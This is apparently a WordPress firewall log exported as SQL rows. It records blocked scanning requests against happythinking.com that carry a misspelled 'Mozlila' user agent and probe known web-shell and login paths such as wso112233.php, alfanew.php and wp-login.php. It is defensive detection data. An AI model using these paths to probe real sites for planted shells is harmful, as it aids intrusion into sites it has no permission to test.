(50891, 1712082274.407740, 1712082273.961800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50857, 1712062430.293564, 1712062429.880500, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-login.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(50858, 1712062429.034111, 1712062428.638900, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/install.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luc3RhbGwucGhw","category":"brute-force","ssl":1}'),
(50859, 1712062427.798539, 1712062427.406200, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/fw.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Z3LnBocA==","category":"brute-force","ssl":1}'),
(50861, 1712062424.950447, 1712062424.452300, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-atom.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWF0b20ucGhw","category":"brute-force","ssl":1}'),
(50890, 1712082284.444559, 1712082284.016800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/log.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2xvZy5waHA=","category":"brute-force","ssl":1}'),
(50860, 1712062426.381527, 1712062425.982500, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/alfanew.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFuZXcucGhw","category":"brute-force","ssl":1}'),
(50889, 1712082292.024986, 1712082291.591100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50863, 1712062422.025992, 1712062421.572800, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-sigunq.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLXNpZ3VucS5waHA=","category":"brute-force","ssl":1}'),
(50862, 1712062423.502127, 1712062423.058600, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/wso112233.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzbzExMjIzMy5waHA=","category":"brute-force","ssl":1}'),
(51987, 1712689457.584402, 1712689457.177900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/wp-2019.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLTIwMTkucGhw","category":"brute-force","ssl":1}'),
(51939, 1712637398.463173, 1712637398.148900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wso112233.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzbzExMjIzMy5waHA=","category":"brute-force","ssl":1}'),
(50827, 0.000000, 1712000956.648221, '\0\0\0\0\0\0\0\0\0\0ÿÿD·¼­', 0, 200, 0, 0, 0, 'https://www.happythinking.com//xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(50820, 1712000428.234869, 1712000427.335600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/updates.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZGF0ZXMucGhw","category":"brute-force","ssl":1}'),
(51938, 1712637414.152199, 1712637413.859300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-atom.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWF0b20ucGhw","category":"brute-force","ssl":1}'),
(51924, 1712636698.232113, 1712636697.824300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/admin.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(52055, 1712761754.413354, 1712761754.110200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/inc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luYy5waHA=","category":"brute-force","ssl":1}'),
(51925, 1712636688.616597, 1712636688.285300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JlcGVhdGVyLnBocA==","category":"brute-force","ssl":1}'),
(51926, 1712637608.716429, 1712637608.016500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/text.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3RleHQucGhw","category":"brute-force","ssl":1}'),
(51994, 1712689381.386924, 1712689381.064800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/b0x.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2IweC5waHA=","category":"brute-force","ssl":1}'),
(51927, 1712637601.976109, 1712637600.981500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/autoload_classmap.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F1dG9sb2FkX2NsYXNzbWFwLnBocA==","category":"brute-force","ssl":1}'),
(51928, 1712637586.735763, 1712637585.953700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/inputs.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2lucHV0cy5waHA=","category":"brute-force","ssl":1}'),
(52056, 1712761743.757457, 1712761743.429200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/admin.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FkbWluLnBocA==","category":"brute-force","ssl":1}'),
(51940, 1712637378.033032, 1712637377.580200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-sigunq.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLXNpZ3VucS5waHA=","category":"brute-force","ssl":1}'),
(51934, 1712637498.836540, 1712637498.494900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-login.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(52058, 1712762276.968555, 1712762276.577100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/bypass.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2J5cGFzcy5waHA=","category":"brute-force","ssl":1}'),
(51989, 1712689437.907619, 1712689437.507300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/network.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L25ldHdvcmsucGhw","category":"brute-force","ssl":1}'),
(51990, 1712689429.854503, 1712689429.462800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/cong.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NvbmcucGhw","category":"brute-force","ssl":1}'),
(52057, 1712761721.910999, 1712761721.468300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JlcGVhdGVyLnBocA==","category":"brute-force","ssl":1}'),
